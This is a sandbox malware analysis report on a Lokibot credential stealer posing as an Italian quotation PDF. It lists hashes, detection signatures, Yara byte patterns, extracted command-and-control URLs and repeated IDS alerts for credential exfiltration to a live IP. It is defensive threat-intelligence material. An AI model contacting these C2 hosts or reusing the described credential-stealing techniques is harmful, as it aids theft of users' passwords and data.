Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report QUOTAZIONEpdf.exe

Overview

General Information

Sample Name:QUOTAZIONEpdf.exe
Analysis ID:553085
MD5:23b85c2f43b23b57411e4f4366a10b25
SHA1:1511bfee72f99f691c93a1e6b070724890c6aea8
SHA256:9ad929181f755701c0152618393ccff03e0499944c2e3f22fa2d0539347f5c45
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • QUOTAZIONEpdf.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" MD5: 23B85C2F43B23B57411E4F4366A10B25)
    • QUOTAZIONEpdf.exe (PID: 808 cmdline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" MD5: 23B85C2F43B23B57411E4F4366A10B25)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://slimpackage.com/slimmain/five/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x13ffc:$a2: last_compatible_version
        Click to see the 37 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.QUOTAZIONEpdf.exe.3040000.4.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13278:$s1: http://
        • 0x16233:$s1: http://
        • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13280:$s2: https://
        • 0x13278:$f1: http://
        • 0x16233:$f1: http://
        • 0x13280:$f2: https://
        1.2.QUOTAZIONEpdf.exe.3040000.4.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          1.2.QUOTAZIONEpdf.exe.3040000.4.unpackLoki_1Loki Payloadkevoreilly
          • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
          • 0x133fc:$a2: last_compatible_version
          1.2.QUOTAZIONEpdf.exe.3040000.4.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
          • 0x123ff:$des3: 68 03 66 00 00
          • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
          • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
          1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          Click to see the 82 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://slimpackage.com/slimmain/five/fre.php"]}
          Antivirus detection for URL or domainShow sources
          Source: http://slimpackage.com/slimmain/five/fre.phpAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: slimpackage.comVirustotal: Detection: 5%Perma Link
          Source: http://slimpackage.com/slimmain/five/fre.phpVirustotal: Detection: 8%Perma Link
          Machine Learning detection for sampleShow sources
          Source: QUOTAZIONEpdf.exeJoe Sandbox ML: detected
          Source: 2.0.QUOTAZIONEpdf.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: QUOTAZIONEpdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,1_2_00405D7C
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004053AA
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49743 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49771 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49771 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49771 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49772 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49772 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49772 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49775 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49775 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49775 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49781 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49781 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49781 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49789 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49789 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49789 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49806 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49806 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49806 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49813 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49813 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49813 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49814 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49814 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49814 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49815 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49815 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49815 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49821 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49821 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49821 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49822 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49822 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49822 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49824 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49824 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49824 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49825 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49825 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49825 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49826 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49826 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49826 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49832 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49832 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49832 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49840 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49840 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49840 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49852 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49852 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49852 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49853 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49853 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49853 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49854 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49854 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49854 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49855 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49855 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49855 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49856 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49856 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49856 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49857 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49857 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49857 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49858 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49858 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49858 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49860 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49860 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49860 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49861 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49861 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49861 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49862 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49862 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49862 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49863 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49863 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49863 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49864 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49864 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49864 -> 104.223.93.105:80
